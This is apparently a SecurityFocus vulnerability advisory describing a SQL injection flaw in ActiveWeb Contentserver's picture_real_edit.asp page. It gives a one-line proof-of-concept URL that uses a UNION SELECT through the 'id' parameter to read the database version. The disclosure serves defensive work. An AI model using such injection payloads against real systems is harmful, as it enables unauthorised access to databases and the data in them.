ActiveWeb Contentserver Picture_Real_Edit.ASP SQL Injection Vulnerability

This issue may be triggered using a browser.

The following proof-of-concept has been provided:

https://www.example.com/admin/picture/picture_real_edit.asp?id='%20union%20select%20@@version%20,@@microsoftversion,@@version--


 

Privacy Statement
Copyright 2010, SecurityFocus